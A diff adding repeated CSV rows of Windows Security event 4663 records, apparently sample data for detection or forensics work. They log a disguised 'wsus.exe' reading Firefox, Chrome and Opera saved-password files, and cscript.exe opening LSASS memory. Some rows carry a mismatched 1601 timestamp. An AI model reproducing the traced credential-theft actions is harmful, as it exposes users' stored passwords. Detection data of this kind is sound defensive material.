+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:05.308188Z"">
+    </TimeCreated>
+    <EventRecordID>4989</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:31:15.355063Z"">
+    </TimeCreated>
+    <EventRecordID>4988</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""68"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12802</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-08T22:11:34.340584Z"">
+    </TimeCreated>
+    <EventRecordID>314462</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""160"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x33392</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Process</Data>
+    <Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
+    <Data Name=""HandleId"">0x558</Data>
+    <Data Name=""AccessList"">%%4484 
+				</Data>
+    <Data Name=""AccessMask"">0x10</Data>
+    <Data Name=""ProcessId"">0x1688</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""ResourceAttributes"">-</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:50.134293Z"">
+    </TimeCreated>
+    <EventRecordID>4991</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""44"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:18.699755Z"">
+    </TimeCreated>
+    <EventRecordID>4990</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:05.308188Z"">
+    </TimeCreated>
+    <EventRecordID>4989</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:31:15.355063Z"">
+    </TimeCreated>
+    <EventRecordID>4988</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""68"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12802</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-08T22:11:34.340584Z"">
+    </TimeCreated>
+    <EventRecordID>314462</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""160"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x33392</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Process</Data>
+    <Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
+    <Data Name=""HandleId"">0x558</Data>
+    <Data Name=""AccessList"">%%4484 
+				</Data>
+    <Data Name=""AccessMask"">0x10</Data>
+    <Data Name=""ProcessId"">0x1688</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""ResourceAttributes"">-</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:50.134293Z"">
+    </TimeCreated>
+    <EventRecordID>4991</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""44"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:18.699755Z"">
+    </TimeCreated>
+    <EventRecordID>4990</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:05.308188Z"">
+    </TimeCreated>
+    <EventRecordID>4989</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:31:15.355063Z"">
+    </TimeCreated>
+    <EventRecordID>4988</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""68"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12802</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-08T22:11:34.340584Z"">
+    </TimeCreated>
+    <EventRecordID>314462</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""160"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x33392</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Process</Data>
+    <Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
+    <Data Name=""HandleId"">0x558</Data>
+    <Data Name=""AccessList"">%%4484 
+				</Data>
+    <Data Name=""AccessMask"">0x10</Data>
+    <Data Name=""ProcessId"">0x1688</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""ResourceAttributes"">-</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:50.134293Z"">
+    </TimeCreated>
+    <EventRecordID>4991</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""44"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:18.699755Z"">
+    </TimeCreated>
+    <EventRecordID>4990</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:05.308188Z"">
+    </TimeCreated>
+    <EventRecordID>4989</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
